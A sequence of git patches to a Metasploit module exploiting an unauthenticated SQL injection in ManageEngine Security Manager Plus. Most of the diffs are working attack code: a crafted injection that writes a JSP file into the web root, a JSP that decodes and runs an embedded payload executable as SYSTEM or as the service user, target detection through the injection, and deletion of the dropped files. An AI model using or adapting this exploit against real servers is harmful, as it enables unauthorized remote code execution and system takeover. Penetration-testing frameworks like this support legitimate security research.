ManageEngine Security Manager Plus - advanced search page. It will send a malicious SQL query to create a JSP file - under the web root directory, and then let it download and execute our malicious - executable under the context of SYSTEM. Authentication is not required in order - to exploit this vulnerability. + advanced search page, which results in remote code execution under the context of + SYSTEM. Authentication is not required in order to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => @@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote end - # - # Transfer the malicious executable to our victim - # - def on_client_connect(cli) - print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") - cli.put(@native_payload) - service.close_client(cli) - end - - # # Generate a download+exe JSP payload # @@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] my_port = datastore['SRVPORT'] - var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) - var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3) - var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3) - var_socket = Rex::Text.rand_text_alpha(rand(8) + 3) - var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3) - var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) - var_temp = Rex::Text.rand_text_alpha(rand(8) + 3) - var_path = Rex::Text.rand_text_alpha(rand(8) + 3) - var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + native_payload = Rex::Text.encode_base64(generate_payload_exe) + native_payload_name = rand_text_alpha(rand(6)+3) jsp = %Q| <%@page import="java.io.*"%> - <%@page import="java.net.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% - StringBuffer #{var_buf} = new StringBuffer(); - byte[] #{var_shellcode} = null; - BufferedOutputStream #{var_outstream} = null; + byte[] shellcode = null; + BufferedOutputStream outstream = null; try { - Socket #{var_socket} = new Socket("#{my_host}", #{my_port}); - BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream())); - while (#{var_buf}.length() < #{@native_payload.length}) { - #{var_buf}.append( (char) #{var_bufreader}.read()); - } + String buf = "#{native_payload}"; - BASE64Decoder #{var_decoder} = new BASE64Decoder(); - #{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); + BASE64Decoder decoder = new BASE64Decoder(); + shellcode = decoder.decodeBuffer(buf.toString()); - File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe"); - String #{var_path} = #{var_temp}.getAbsolutePath(); + File temp = File.createTempFile("#{native_payload_name}", ".exe"); + String path = temp.getAbsolutePath(); - #{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); - #{var_outstream}.write(#{var_shellcode}); - #{var_outstream}.close(); + outstream = new BufferedOutputStream(new FileOutputStream(path)); + outstream.write(shellcode); + outstream.close(); - Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); + Process p = Runtime.getRuntime().exec(path); } catch (Exception e) {} %> | @@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote # Run the actual exploit # def inject_exec - # This little lag is meant to ensure the TCP server runs first before the requests - select(nil, nil, nil, 1) - # Inject our JSP payload hex_jsp = generate_jsp_payload @@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote # The server must start first, and then we send the malicious requests # def exploit - # Avoid passing this as an argument for performance reasons - # This is in base64 is make sure our file isn't mangled - @native_payload = [generate_payload_exe].pack("m*") - @native_payload_name = rand_text_alpha(rand(6)+3) - @jsp_name = rand_text_alpha(rand(6)+3) - @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + @jsp_name = rand_text_alpha(rand(6)+3) + @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" - begin - t = framework.threads.spawn("reqs", false) { inject_exec } - print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") - super - ensure - t.kill - end + inject_exec end end \ No newline at end of file From bc3472a9b9fd34ce4179d10ca3d635de3783f8e6 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 11:41:53 -0500 Subject: [PATCH 35/74] Randomize variable names --- .../windows/http/manageengine_search_sqli.rb | 32 ++++++++++++------- 1 file changed, 20 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index df64d9b802..bcf7366b28 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb +++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote # - # Generate a download+exe JSP payload + # Embeds our executable in JSP # def generate_jsp_payload my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] @@ -94,27 +94,35 @@ class Metasploit3 < Msf::Exploit::Remote native_payload = Rex::Text.encode_base64(generate_payload_exe) native_payload_name = rand_text_alpha(rand(6)+3) + var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) + var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) + var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) + var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) + var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) + var_path = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% - byte[] shellcode = null; - BufferedOutputStream outstream = null; + byte[] #{var_raw} = null; + BufferedOutputStream #{var_ostream} = null; try { - String buf = "#{native_payload}"; + String #{var_buf} = "#{native_payload}"; - BASE64Decoder decoder = new BASE64Decoder(); - shellcode = decoder.decodeBuffer(buf.toString()); + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); - File temp = File.createTempFile("#{native_payload_name}", ".exe"); - String path = temp.getAbsolutePath(); + File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".exe"); + String #{var_path} = #{var_tmp}.getAbsolutePath(); - outstream = new BufferedOutputStream(new FileOutputStream(path)); - outstream.write(shellcode); - outstream.close(); + #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_ostream}.write(#{var_raw}); + #{var_ostream}.close(); - Process p = Runtime.getRuntime().exec(path); + Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) {} %> | From e05d353e8a9e11a52a901c699f7b2ee08ec2b2a8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:40:13 -0500 Subject: [PATCH 36/74] Add Linux support --- .../windows/http/manageengine_search_sqli.rb | 35 +++++++++++++------ 1 file changed, 24 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index bcf7366b28..b184b96936 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb +++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -25,21 +25,22 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'xistence ', # Discovery & Metasploit module - 'sinn3r' # Improved Metasploit module + 'sinn3r', # Improved Metasploit module + 'egypt' # Improved Metasploit module ], 'References' => [ ['EDB','22094'], ['BID', '56138'] ], - 'Platform' => 'win', + #'Platform' => ['win', 'linux'], 'Targets' => [ - ['Windows Universal', {}] + ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], + ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }] ], 'Privileged' => false, - 'DisclosureDate' => "Oct 18 2012", - 'DefaultTarget' => 0)) + 'DisclosureDate' => "Oct 18 2012")) register_options( [ @@ -92,7 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote my_port = datastore['SRVPORT'] native_payload = Rex::Text.encode_base64(generate_payload_exe) - native_payload_name = rand_text_alpha(rand(6)+3) + native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3) + ext = (target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) @@ -100,7 +102,17 @@ class Metasploit3 < Msf::Exploit::Remote var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) var_path = Rex::Text.rand_text_alpha(rand(8) + 3) - var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) + + if target['Platform'] == 'linux' + var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) + chmod = %Q| + Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); + Thread.sleep(200); + | + else + chmod = '' + end jsp = %Q| <%@page import="java.io.*"%> @@ -115,15 +127,16 @@ class Metasploit3 < Msf::Exploit::Remote BASE64Decoder #{var_decoder} = new BASE64Decoder(); #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); - File #{var_tmp} = File.createTempFile("#{native_payload_name}", ".exe"); + File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); String #{var_path} = #{var_tmp}.getAbsolutePath(); #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); - - Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); - } catch (Exception e) {} + #{chmod} + Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + } catch (Exception e) { + } %> | From 5f088fa71847a90c01686fd4cafaf01d987390ab Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:41:17 -0500 Subject: [PATCH 37/74] Remove default platform --- modules/exploits/windows/http/manageengine_search_sqli.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb index b184b96936..2fde8ffac4 100644 --- a/modules/exploits/windows/http/manageengine_search_sqli.rb +++ b/modules/exploits/windows/http/manageengine_search_sqli.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote ['EDB','22094'], ['BID', '56138'] ], - #'Platform' => ['win', 'linux'], 'Targets' => [ ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], From 3ff888a5c056f28addbbee7f5e2a12751b0187de Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:41:51 -0500 Subject: [PATCH 38/74] Move to 'multi' because it supports windows and linux --- .../exploits/{windows => multi}/http/manageengine_search_sqli.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{windows => multi}/http/manageengine_search_sqli.rb (100%) diff --git a/modules/exploits/windows/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb similarity index 100% rename from modules/exploits/windows/http/manageengine_search_sqli.rb rename to modules/exploits/multi/http/manageengine_search_sqli.rb From bef453991529520303025a1ed10f1a02f65b5cfe Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:47:46 -0500 Subject: [PATCH 39/74] Update description --- modules/exploits/multi/http/manageengine_search_sqli.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 2fde8ffac4..71729a7960 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -19,7 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page, which results in remote code execution under the context of - SYSTEM. Authentication is not required in order to exploit this vulnerability. + SYSTEM in Windows; or as the user in Linux. Authentication is not required in order + to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => From 4c41319c7cc1e74ee9df3b2d94ba6d037bd5d7c3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 12:55:43 -0500 Subject: [PATCH 40/74] Remove unused vars --- modules/exploits/multi/http/manageengine_search_sqli.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 71729a7960..51331bd52e 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -89,9 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote # Embeds our executable in JSP # def generate_jsp_payload - my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] - my_port = datastore['SRVPORT'] - native_payload = Rex::Text.encode_base64(generate_payload_exe) native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3) ext = (target['Platform'] == 'win') ? '.exe' : '.bin' From 22223d5d8188a18c37c296f7ddc182a709d3cbf4 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 13:58:19 -0500 Subject: [PATCH 41/74] Better cleanup abilities --- .../multi/http/manageengine_search_sqli.rb | 30 +++++++++++++++---- 1 file changed, 24 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 51331bd52e..066b8f5371 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -68,16 +68,26 @@ class Metasploit3 < Msf::Exploit::Remote # We cannot delete the executable because it will still be in use. # def on_new_session(cli) - if cli.type != 'meterpreter' - print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") - return + if target['Platform'] == 'linux' + print_warning("Malicious executable is removed during payload execution") end - cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + if cli.type == 'meterpreter' + cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + end begin + path = "../webapps/SecurityManager/#{@jsp_name + '.jsp'}" print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") - cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") + + if cli.type == 'meterpreter' + cli.fs.file.rm(path) + else + del_cmd = (target['Platform'] == 'linux') ? 'rm' : 'del' + path = path.gsub(/\//, '\\') if target['Platform'] == 'win' + cli.shell_command_token("#{del_cmd} \"#{path}\"") + end + print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") rescue ::Exception => e print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") @@ -107,8 +117,15 @@ class Metasploit3 < Msf::Exploit::Remote Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); Thread.sleep(200); | + + var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) + cleanup = %Q| + Thread.sleep(200); + Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); + | else - chmod = '' + chmod = '' + cleanup = '' end jsp = %Q| @@ -132,6 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote #{var_ostream}.close(); #{chmod} Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + #{cleanup} } catch (Exception e) { } %> From 90542547c6d590352e69818648a8e0ccb95b11eb Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 19:07:13 -0500 Subject: [PATCH 42/74] Add auto-target, and some changes to cleanup --- .../multi/http/manageengine_search_sqli.rb | 128 ++++++++++++------ 1 file changed, 89 insertions(+), 39 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 066b8f5371..6e3106070d 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -34,11 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote ['EDB','22094'], ['BID', '56138'] ], + 'Platform' => ['win', 'linux'], 'Targets' => [ - ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], - ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }] + ['Automatic', {}], + ['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }], + ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }] ], + 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => "Oct 18 2012")) @@ -63,9 +66,39 @@ class Metasploit3 < Msf::Exploit::Remote end + def pick_target + return target if target.name != 'Automatic' + + rnd_num = Rex::Text.rand_text_numeric(1) + rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt" + outpath = "../../webapps/SecurityManager/#{rnd_fname}" + + @clean_ups << outpath + + sqli = "#{rnd_num})) union select @@version," + sqli << (2..28).map {|e| e} * "," + sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" + sqli_exec(sqli) + + res = send_request_raw({'uri'=>"/#{rnd_fname}"}) + + # Linux = 5.0.36-enterprise + # Windows = 5.0.36-enterprise-nt + + if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/ + print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}") + return targets[1] # Windows target + elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/ + print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}") + return targets[2] + end + + return nil + end + + # - # Remove the JSP once we get a shell. - # We cannot delete the executable because it will still be in use. + # We're in SecurityManager/bin at this point # def on_new_session(cli) if target['Platform'] == 'linux' @@ -77,20 +110,23 @@ class Metasploit3 < Msf::Exploit::Remote end begin - path = "../webapps/SecurityManager/#{@jsp_name + '.jsp'}" - print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") + @clean_ups.each { |f| + base = File.basename(f) + f = "../webapps/SecurityManager/#{base}" + print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"") - if cli.type == 'meterpreter' - cli.fs.file.rm(path) - else - del_cmd = (target['Platform'] == 'linux') ? 'rm' : 'del' - path = path.gsub(/\//, '\\') if target['Platform'] == 'win' - cli.shell_command_token("#{del_cmd} \"#{path}\"") - end + if cli.type == 'meterpreter' + cli.fs.file.rm(f) + else + del_cmd = (@my_target['Platform'] == 'linux') ? 'rm' : 'del' + f = f.gsub(/\//, '\\') if @my_target['Platform'] == 'win' + cli.shell_command_token("#{del_cmd} \"#{f}\"") + end - print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + print_good("#{rhost}:#{rport} - \"#{base}\" deleted") + } rescue ::Exception => e - print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") + print_error("Unable to delete: #{e.message}") end end @@ -99,9 +135,10 @@ class Metasploit3 < Msf::Exploit::Remote # Embeds our executable in JSP # def generate_jsp_payload - native_payload = Rex::Text.encode_base64(generate_payload_exe) + opts = {:arch => @my_target.arch, :platform => @my_target.platform} + native_payload = Rex::Text.encode_base64(generate_payload_exe(opts)) native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3) - ext = (target['Platform'] == 'win') ? '.exe' : '.bin' + ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin' var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) @@ -111,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote var_path = Rex::Text.rand_text_alpha(rand(8) + 3) var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) - if target['Platform'] == 'linux' + if @my_target['Platform'] == 'linux' var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) chmod = %Q| Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); @@ -161,14 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp.unpack("H*")[0] end - - # - # Run the actual exploit - # - def inject_exec - # Inject our JSP payload - hex_jsp = generate_jsp_payload - + def sqli_exec(sqli_string) cookie = 'STATE_COOKIE=&' cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&' cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&' @@ -180,14 +210,9 @@ class Metasploit3 < Msf::Exploit::Remote cookie << '2RequestsshowThreadedReq=showThreadedReqshow; ' cookie << '2RequestshideThreadedReq=hideThreadedReqhide;' - rnd_num = Rex::Text.rand_text_numeric(1) - sqli = "#{rnd_num})) union select 0x#{hex_jsp}," - sqli << (2..28).map {|e| e} * "," - sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" - state_id = Rex::Text.rand_text_numeric(5) - print_status("#{rhost}:#{rport} - Sending JSP payload") - res = send_request_cgi({ + + send_request_cgi({ 'method' => 'POST', 'uri' => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp", 'headers' => { @@ -202,13 +227,28 @@ class Metasploit3 < Msf::Exploit::Remote 'ANDOR' => 'and', 'condition_1' => 'OpenPorts@PORT', 'operator_1' => 'IN', - 'value_1' => sqli, + 'value_1' => sqli_string, 'COUNT' => '1' } }) + end - print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}") - send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"}) + # + # Run the actual exploit + # + def inject_exec(out) + hex_jsp = generate_jsp_payload + rnd_num = Rex::Text.rand_text_numeric(1) + sqli = "#{rnd_num})) union select 0x#{hex_jsp}," + sqli << (2..28).map {|e| e} * "," + sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" + + print_status("#{rhost}:#{rport} - Sending JSP payload") + sqli_exec(sqli) + + fname = "/#{File.basename(out)}" + print_status("#{rhost}:#{rport} - Requesting #{fname}") + res = send_request_raw({'uri' => fname}) handler end @@ -218,9 +258,19 @@ class Metasploit3 < Msf::Exploit::Remote # The server must start first, and then we send the malicious requests # def exploit - @jsp_name = rand_text_alpha(rand(6)+3) - @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + @clean_ups = [] - inject_exec + @my_target = pick_target + if @my_target.nil? + print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.") + return + end + + jsp_name = rand_text_alpha(rand(6)+3) + outpath = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}" + + @clean_ups << outpath + + inject_exec(outpath) end end \ No newline at end of file From 8c5a73bb7f17133ca54987f3e438c2970c7aced2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 19:34:12 -0500 Subject: [PATCH 43/74] Change exception handling --- .../multi/http/manageengine_search_sqli.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 6e3106070d..6e79783ad2 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -109,12 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") end - begin - @clean_ups.each { |f| - base = File.basename(f) - f = "../webapps/SecurityManager/#{base}" - print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"") + @clean_ups.each { |f| + base = File.basename(f) + f = "../webapps/SecurityManager/#{base}" + print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"") + begin if cli.type == 'meterpreter' cli.fs.file.rm(f) else @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Exploit::Remote end print_good("#{rhost}:#{rport} - \"#{base}\" deleted") - } - rescue ::Exception => e - print_error("Unable to delete: #{e.message}") - end + rescue ::Exception => e + print_error("Unable to delete: #{e.message}") + end + } end From f9bb910c3bd4e7d962ea1c8b61fa6913cd75451c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 19:42:36 -0500 Subject: [PATCH 44/74] Make the check() try SQLI --- .../exploits/multi/http/manageengine_search_sqli.rb | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 6e79783ad2..c660de1ea4 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -52,14 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote end - # - # A very gentle check to see if Security Manager Plus exists or not - # def check - res = send_request_raw({'uri' => '/SecurityManager.cc'}) + res = sqli_exec(Rex::Text.rand_text_alpha(1)) - if res and res.body =~ /\SecurityManager Plus\<\/title\>/ - return Exploit::CheckCode::Detected + if res and res.body =~ /Error during search/ + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end @@ -82,6 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri'=>"/#{rnd_fname}"}) + # What @@version returns: # Linux = 5.0.36-enterprise # Windows = 5.0.36-enterprise-nt @@ -248,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote fname = "/#{File.basename(out)}" print_status("#{rhost}:#{rport} - Requesting #{fname}") - res = send_request_raw({'uri' => fname}) + send_request_raw({'uri' => fname}) handler end From 8eb790f62c38f4cf05be25f9b9be8a60a8ce40d2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 19:46:09 -0500 Subject: [PATCH 45/74] Final touchup --- modules/exploits/multi/http/manageengine_search_sqli.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index c660de1ea4..8b27eb6f73 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -241,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << (2..28).map {|e| e} * "," sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" - print_status("#{rhost}:#{rport} - Sending JSP payload") + print_status("#{rhost}:#{rport} - Trying SQL injection...") sqli_exec(sqli) fname = "/#{File.basename(out)}" @@ -252,10 +252,8 @@ class Metasploit3 < Msf::Exploit::Remote end - # - # The server must start first, and then we send the malicious requests - # def exploit + # This is used to collect files we want to delete later @clean_ups = [] @my_target = pick_target From f1423bf0b4fbb026ea44c2f41bcd4b4262a90071 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 24 Oct 2012 00:44:53 -0500 Subject: [PATCH 46/74] If a message is clearly a warning, then use print_warning --- modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb | 4 ++-- modules/auxiliary/spoof/dns/bailiwicked_domain.rb | 2 +- modules/auxiliary/spoof/dns/bailiwicked_host.rb | 2 +- modules/exploits/multi/http/jboss_bshdeployer.rb | 6 +++--- .../exploits/multi/http/jboss_deploymentfilerepository.rb | 4 ++-- modules/exploits/multi/http/jboss_maindeployer.rb | 8 ++++---- modules/exploits/multi/http/openfire_auth_bypass.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 6 +++--- modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 2 +- modules/exploits/unix/webapp/openx_banner_edit.rb | 4 ++-- modules/exploits/unix/webapp/twiki_history.rb | 4 ++-- modules/exploits/unix/webapp/twiki_search.rb | 4 ++-- .../exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 2 +- modules/exploits/windows/iis/iis_webdav_upload_asp.rb | 6 +++--- modules/exploits/windows/local/current_user_psexec.rb | 4 ++-- modules/exploits/windows/ssl/ms04_011_pct.rb | 2 +- modules/exploits/windows/wins/ms04_045_wins.rb | 2 +- 17 files changed, 32 insertions(+), 32 deletions(-) diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 28f0f916b1..9b25f90db8 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -135,8 +135,8 @@ class Metasploit3 < Msf::Auxiliary sunrpc_destroy rescue ::Rex::Proto::SunRPC::RPCTimeout - print_status 'Warning: ' + $! - print_status 'Exploit may or may not have succeeded.' + print_warning 'Warning: ' + $! + print_warning 'Exploit may or may not have succeeded.' end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 1c402a3b23..e5a842abde 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Auxiliary end if(reps < 30) - print_status("WARNING: This server did not reply to all of our requests") + print_warning("WARNING: This server did not reply to all of our requests") end if(random) diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 441ab15a8e..df60299919 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -134,7 +134,7 @@ class Metasploit3 < Msf::Auxiliary end if(reps < 30) - print_status("WARNING: This server did not reply to all of our requests") + print_warning("WARNING: This server did not reply to all of our requests") end if(random) diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb 